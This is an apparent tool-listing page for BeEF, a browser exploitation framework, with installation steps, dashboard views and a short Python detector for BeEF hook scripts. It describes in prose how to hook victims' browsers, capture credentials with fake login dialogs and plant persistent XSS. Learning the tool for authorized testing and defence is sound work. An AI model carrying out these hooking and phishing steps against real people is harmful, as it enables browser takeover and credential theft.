BEEF-XSS

Pentesting Tool

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.

Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.



SYSTEM REQUIREMENTS

RAM : Minimum 512MB (Recommended: 1 GB)

Storage : 2 MB disk space for Installation.

OS : macOS 10.5.0 or higher, modern Linux (Windows is not officially supported)

Architecture : Supports both 32-bit and 64-bit architectures

Available On : macOS, Linux (Windows support is possible via Cygwin, but not officially supported)


ADDITIONAL INFORMATION

Published By

BeEF Project (maintained by a community of contributors)

Release Date

February 2006

Approximate Size

30.9 KB for Archives

Publisher Info

BeEF is an open-source project focused on web browser security and penetration testing

Supported Languages

English

Last Update

May 2024 (Version 0.5.4.0)

Programming Language

Ruby, Node.js, SQLite

Operating System

Cross-platform (macOS, Linux)

License

GNU General Public License (GPL)

  • Open source
  • The extension API
  • RESTful API
  • Keystroke logging
  • Browser proxying
  • Integration with Metasploit
  • Hooking through QR codes
  • PhoneGap modules
  • Plugin detection
  • Intranet service exploitation
  • Custom browser exploitation commands

  1. Hooked Browsers : This is where you'll see a list of all currently hooked browsers. Each browser is listed with details such as IP address, browser name, and operating system. As no browsers are hooked initially, this section will be empty.
  2. Getting Started : This section provides guidance on how to use the BeEF framework. It includes information on how to hook a browser and use command modules.
  3. Logs : This section shows a log of the BeEF activity. This includes interactions with the target browsers, commands sent, responses received, and any errors or important system messages.
  4. Zombies : In BeEF terminology, a "zombie" is a hooked browser that the BeEF server controls. The "Zombies" section lists these browsers and allows you to interact with them. As no browsers are hooked yet, this section will also be empty.
  5. Basic : This view provides basic information about the hooked browser, such as the IP address, browser type, and operating system. In this view, you can also use the available command modules to interact with the hooked browser.
  6. Requester : The "Requester" view lets you manually craft and send HTTP requests from the hooked browser. This can be useful for exploring the website or web application from the perspective of the hooked browser, testing access controls, or performing other manual testing tasks.

  1. On the surface, it might seem that there's little opportunity for blue-team use of a tool like this. By applying creativity, however, there are opportunities to bolster defensive efforts, as well as red-team activities.
  2. Auditors, for example, might consider using BeEF to help validate zero-trust efforts. A key tenet of zero trust is that access to resources shouldn't be gated on the basis of point of origin alone. A tool that lets you compare internal access to a resource, using a hooked browser as a conduit, with external access to that same resource provides important data.
  3. Alternatively, you might consider using it as part of a phishing simulation exercise after a user clicks a simulated malicious link. Or you might use it to validate your organization's browser configuration and hardening standards.

Starting BeEF
  1. Run BeEF : beef-xss
  2. Set a password for the first time : Enter new password
  3. Access the BeEF web interface : http://localhost:3000/ui/panel
Hooking a Browser
  1. Create a hook script : hook.js (default) or customize your own.
  2. Upload the hook script to a web server or a vulnerable webpage.
  3. A victim visits the webpage, and the page loads the hook script in their browser, which then connects back to the BeEF server.
  4. The hooked browser is added to the BeEF dashboard : http://localhost:3000/ui/panel
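A defender-side check for the hooking steps above, added here as an example (it is not part of the original page or of BeEF): it scans a page's HTML for script tags that load a file named hook.js or that load from port 3000 on a host other than the page's own. The function name, sample HTML and host names are constructed, and a renamed hook file or a non-default port would not match.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Defaults taken from the page: hook file name and BeEF server port.
DEFAULT_HOOK_NAME = "hook.js"
DEFAULT_BEEF_PORT = 3000


class _ScriptCollector(HTMLParser):
    """Collects the src attribute of every <script> tag."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src.strip())


def find_suspect_scripts(page_url, html):
    """Return (script_url, reasons) for scripts matching BeEF defaults."""
    page_host = urlsplit(page_url).hostname
    collector = _ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.sources:
        url = urljoin(page_url, src)  # resolves relative and // URLs
        parts = urlsplit(url)
        reasons = []
        if parts.path.rsplit("/", 1)[-1].lower() == DEFAULT_HOOK_NAME:
            reasons.append("default hook file name")
        if parts.hostname != page_host and parts.port == DEFAULT_BEEF_PORT:
            reasons.append("third-party host on port 3000")
        if reasons:
            findings.append((url, reasons))
    return findings


# Constructed sample: one legitimate script and one injected tag.
SAMPLE_HTML = """
<html><body>
<script src="/static/app.js"></script>
<p>Comment: nice post<script src="//lab-beef.example:3000/hook.js"></script></p>
</body></html>
"""

if __name__ == "__main__":
    for url, why in find_suspect_scripts("https://intranet.example/blog/1", SAMPLE_HTML):
        print(url, "->", ", ".join(why))
```
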
Basic Information Gathering
  1. Select the hooked browser from the dashboard.
  2. Access the “Details” tab to gather information about the browser, such as:
    • Browser name and version
    • User Agent
    • Installed plugins
    • OS architecture
  3. Use the “Fingerprint Browser” command to gather additional information using Fingerprintjs2.
Phishing Attacks
  1. Navigate to “Commands” > "Social Engineering" > “Pretty Theft”.
  2. Select a phishing dialog type (e.g., Facebook).
  3. The hooked browser will display a fake session timeout page, requesting user credentials.
  4. An unsuspecting user may enter their credentials, which will be captured by BeEF.
Persistent XSS
  1. Inject a persistent XSS payload into a vulnerable webpage.
  2. The payload will be stored on the attacker’s server.
  3. When a victim visits the webpage, the payload will be executed, allowing the attacker to communicate with the victim’s browser.
Real-World Use Cases
  1. Penetration testing : Use BeEF to demonstrate XSS vulnerabilities to clients and simulate attacks.
  2. Red-team exercises : Utilize BeEF to test internal access controls and validate zero-trust efforts.
  3. Phishing simulations : Use BeEF to simulate phishing attacks and train users to recognize and avoid suspicious activities.
Best Practices
  1. Use BeEF responsibly and only for authorized purposes.
  2. Ensure proper configuration and hardening of your own browser and systems.
  3. Keep BeEF and its dependencies up-to-date to minimize vulnerabilities.

  • adduser
  • lsof
  • ruby
  • ruby-ansi
  • ruby-async-dns
  • ruby-dev
  • ruby-em-websocket
  • ruby-erubis
  • ruby-espeak
  • ruby-eventmachine
  • ruby-execjs
  • ruby-json
  • ruby-maxmind-db
  • ruby-mime-types
  • ruby-msfrpc-client
  • ruby-otr-activerecord
  • ruby-parseconfig
  • ruby-qr4r
  • ruby-rack
  • ruby-rack-protection
  • ruby-rushover
  • ruby-sinatra
  • ruby-slack-notifier
  • ruby-sqlite3
  • ruby-term-ansicolor
  • ruby-terser
  • ruby-twitter
  • ruby-xmlrpc
  • ruby-zip
  • rubygems-integration
  • thin
  • xdg-utils

Terminal Installation Commands ...

$ sudo apt-get update && sudo apt-get upgrade

$ sudo apt install beef-xss


GUI Installation Steps ...
  1. Linux
    • Ensure you have Ruby 3.0+ and NodeJS installed.
    • Clone the BeEF repository from GitHub or download the latest archive.
    • Run the installation script in the BeEF directory: ./install.
    • Configure the tool by editing the config.yaml file.
  2. Windows
    • BeEF is not officially supported on Windows. However, you can use Docker to run BeEF on Windows, which simplifies the setup process.
      1. Install Docker
        • Ensure Docker is installed on your system. You can find installation instructions for your operating system on the official Docker website.
      2. Clone the BeEF Repository
        • Open a terminal and run :

        $ git clone https://github.com/beefproject/beef.git

        $ cd beef

      3. Set Your Credentials
        • Edit the config.yaml file in the BeEF directory to set your username and password under the credentials key. For example :

        credentials:
          user: '<YOUR_USERNAME>'
          passwd: '<YOUR_PASSWORD>'

      4. Build the Docker Image
        • Run the following command to build the Docker image :

        $ docker build -t beef .

      5. Run the Docker Container
        • Start the BeEF container with the following command :

        $ docker run -p 3000:3000 -p 6789:6789 --name beef beef

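        • This maps the necessary ports for BeEF to your local machine. Docker publishes mapped ports on all host interfaces by default, so on a shared network restrict access with a host firewall or a bind address.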
      6. Access the BeEF Interface
        • Open your browser and navigate to http://localhost:3000/ui/authentication.
        • Log in using the credentials you set in the config.yaml file.
  3. macOS
    • Similar to Linux, but you may need to use a Ruby environment manager like rbenv or rvm for Ruby installation.
    • Follow the same steps as Linux for cloning and running the installation script.

Terminal Uninstallation Commands ...

$ sudo apt remove beef-xss

$ sudo apt autoclean && sudo apt autoremove


GUI Uninstallation Steps ...
Linux & macOS
  1. Delete BeEF Directory :
    • Locate the directory where BeEF was installed (usually where the repository was cloned).
    • Delete the folder by running a command like rm -rf /path/to/beef.
  2. Remove Configuration Files :
    • If you created or modified configuration files like config.yaml, delete them manually.
  3. Uninstall Dependencies :
    • Depending on your installation, you may need to uninstall Ruby, NodeJS, or other packages. Use commands such as :

    $ sudo apt remove ruby nodejs

    $ sudo apt autoremove

Docker (Windows) :
  1. Stop the Container :
    • List all active containers: docker ps.
    • Stop the BeEF container: docker stop <container_id>.
  2. Remove the Container :
    • Run : docker rm <container_id>.
  3. Remove the Image :
    • List all images : docker images.
    • Delete the BeEF image : docker rmi <image_id>.

Copyright © 2025 HACKERSPOT

All original content, including tools, software, and other information, is protected by copyright and remains the property of its respective owners.
